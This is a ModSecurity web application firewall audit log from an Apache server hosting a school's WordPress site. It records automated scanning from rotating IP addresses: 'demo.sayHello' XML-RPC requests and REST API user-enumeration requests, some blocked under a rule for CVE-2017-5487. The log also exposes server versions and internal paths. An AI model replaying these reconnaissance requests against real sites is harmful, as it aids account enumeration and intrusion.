charset=iso-8859-1 --b3d07b5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444889799106 2796 (- - -) Stopwatch2: 1747444889799106 2796; combined=1246, p1=444, p2=773, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3d07b5b-Z-- --e0e22254-A-- [17/May/2025:08:21:32 +0700] aCfknHyxdQCiyU1ENFcnigAAAAc 103.236.140.4 43778 103.236.140.4 8181 --e0e22254-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e0e22254-C-- demo.sayHello --e0e22254-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0e22254-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444892874970 5193 (- - -) Stopwatch2: 1747444892874970 5193; combined=3913, p1=565, p2=3156, p3=27, p4=28, p5=81, sr=63, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0e22254-Z-- --fd483924-A-- [17/May/2025:08:21:34 +0700] aCfknnyxdQCiyU1ENFcniwAAAAk 103.236.140.4 43782 103.236.140.4 8181 --fd483924-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.124 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fd483924-C-- demo.sayHello --fd483924-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd483924-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444894697253 5392 (- - -) Stopwatch2: 1747444894697253 5392; combined=4009, p1=494, p2=3139, p3=30, p4=33, p5=170, sr=75, sw=143, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd483924-Z-- --5580da42-A-- [17/May/2025:08:21:34 +0700] aCfknnyxdQCiyU1ENFcnjAAAAAo 103.236.140.4 43784 103.236.140.4 8181 --5580da42-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.18 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.18 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5580da42-C-- demo.sayHello --5580da42-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5580da42-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444894872110 5285 (- - -) Stopwatch2: 1747444894872110 5285; combined=3962, p1=524, p2=3226, p3=30, p4=31, p5=89, sr=79, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5580da42-Z-- --ba22eb39-A-- [17/May/2025:08:21:45 +0700] aCfkqXyxdQCiyU1ENFcnjwAAABE 103.236.140.4 43792 103.236.140.4 8181 --ba22eb39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ba22eb39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba22eb39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444905138725 2193 (- - -) Stopwatch2: 1747444905138725 2193; combined=1044, p1=346, p2=670, p3=0, p4=0, p5=27, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba22eb39-Z-- --209c774a-A-- [17/May/2025:08:21:50 +0700] aCfkrnyxdQCiyU1ENFcnkAAAAA4 103.236.140.4 43796 103.236.140.4 8181 --209c774a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.74 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --209c774a-C-- demo.sayHello --209c774a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --209c774a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444910409452 6554 (- - -) Stopwatch2: 1747444910409452 6554; combined=4739, p1=595, p2=3902, p3=38, p4=43, p5=96, sr=80, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --209c774a-Z-- --6570a441-A-- [17/May/2025:08:21:55 +0700] aCfks-m4kjNN-hEbWjJA7AAAAEQ 103.236.140.4 43800 103.236.140.4 8181 --6570a441-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6570a441-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6570a441-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444915238577 2275 (- - -) Stopwatch2: 1747444915238577 2275; combined=1032, p1=347, p2=654, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6570a441-Z-- --8328df20-A-- [17/May/2025:08:22:02 +0700] aCfkuum4kjNN-hEbWjJA7gAAAEc 103.236.140.4 43806 103.236.140.4 8181 --8328df20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.149 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8328df20-C-- demo.sayHello --8328df20-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8328df20-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444922902188 6083 (- - -) Stopwatch2: 1747444922902188 6083; combined=4438, p1=532, p2=3639, p3=31, p4=34, p5=115, sr=72, sw=87, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8328df20-Z-- --3344bd23-A-- [17/May/2025:08:22:04 +0700] aCfkvHyxdQCiyU1ENFcnkwAAABU 103.236.140.4 43820 103.236.140.4 8181 --3344bd23-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3344bd23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3344bd23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444924978333 2646 (- - -) Stopwatch2: 1747444924978333 2646; combined=1235, p1=394, p2=813, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3344bd23-Z-- --24c6a660-A-- [17/May/2025:08:22:14 +0700] aCfkxum4kjNN-hEbWjJA8QAAAE0 103.236.140.4 43824 103.236.140.4 8181 --24c6a660-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --24c6a660-C-- demo.sayHello --24c6a660-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --24c6a660-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444934510058 4854 (- - -) Stopwatch2: 1747444934510058 4854; combined=3737, p1=467, p2=3071, p3=24, p4=27, p5=88, sr=89, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24c6a660-Z-- --03e81736-A-- [17/May/2025:08:22:15 +0700] aCfkx-m4kjNN-hEbWjJA8gAAAE4 103.236.140.4 43826 103.236.140.4 8181 --03e81736-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --03e81736-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03e81736-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444935418538 1981 (- - -) Stopwatch2: 1747444935418538 1981; combined=950, p1=319, p2=604, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03e81736-Z-- --245d8237-A-- [17/May/2025:08:22:19 +0700] aCfky3yxdQCiyU1ENFcnlQAAAAA 103.236.140.4 43834 103.236.140.4 8181 --245d8237-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --245d8237-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --245d8237-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444939898477 2566 (- - -) Stopwatch2: 1747444939898477 2566; combined=1174, p1=399, p2=747, p3=0, p4=0, p5=28, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --245d8237-Z-- --cb8a5d2e-A-- [17/May/2025:08:22:22 +0700] aCfkznyxdQCiyU1ENFcnlwAAAAI 103.236.140.4 43838 103.236.140.4 8181 --cb8a5d2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cb8a5d2e-C-- demo.sayHello --cb8a5d2e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb8a5d2e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444942399481 5526 (- - -) Stopwatch2: 1747444942399481 5526; combined=4136, p1=512, p2=3404, p3=29, p4=34, p5=93, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb8a5d2e-Z-- --9849e12f-A-- [17/May/2025:08:22:29 +0700] aCfk1XyxdQCiyU1ENFcnmQAAAAU 103.236.140.4 43844 103.236.140.4 8181 --9849e12f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.27 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9849e12f-C-- demo.sayHello --9849e12f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9849e12f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444949106109 6594 (- - -) Stopwatch2: 1747444949106109 6594; combined=4807, p1=640, p2=3790, p3=40, p4=42, p5=202, sr=82, sw=93, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9849e12f-Z-- --d559fd5c-A-- [17/May/2025:08:22:39 +0700] aCfk33yxdQCiyU1ENFcnmwAAAAY 103.236.140.4 43848 103.236.140.4 8181 --d559fd5c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d559fd5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d559fd5c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444959841439 3278 (- - -) Stopwatch2: 1747444959841439 3278; combined=1394, p1=476, p2=886, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d559fd5c-Z-- --58a05823-A-- [17/May/2025:08:22:45 +0700] aCfk5QTOsBn9MSWb6WJulgAAAIw 103.236.140.4 43896 103.236.140.4 8181 --58a05823-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.175 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58a05823-C-- demo.sayHello --58a05823-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58a05823-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747444965291190 5562 (- - -) Stopwatch2: 1747444965291190 5562; combined=4261, p1=504, p2=3527, p3=31, p4=38, p5=95, sr=75, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58a05823-Z-- --aae8ca3c-A-- [17/May/2025:08:23:15 +0700] aCflAxKi5m5upc8uMd6iKgAAAMQ 103.236.140.4 43900 103.236.140.4 8181 --aae8ca3c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --aae8ca3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aae8ca3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747444995129005 3378 (- - -) Stopwatch2: 1747444995129005 3378; combined=1506, p1=512, p2=953, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aae8ca3c-Z-- --380f3d45-A-- [17/May/2025:08:23:22 +0700] aCflChKi5m5upc8uMd6iKwAAAMM 103.236.140.4 43904 103.236.140.4 8181 --380f3d45-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.21 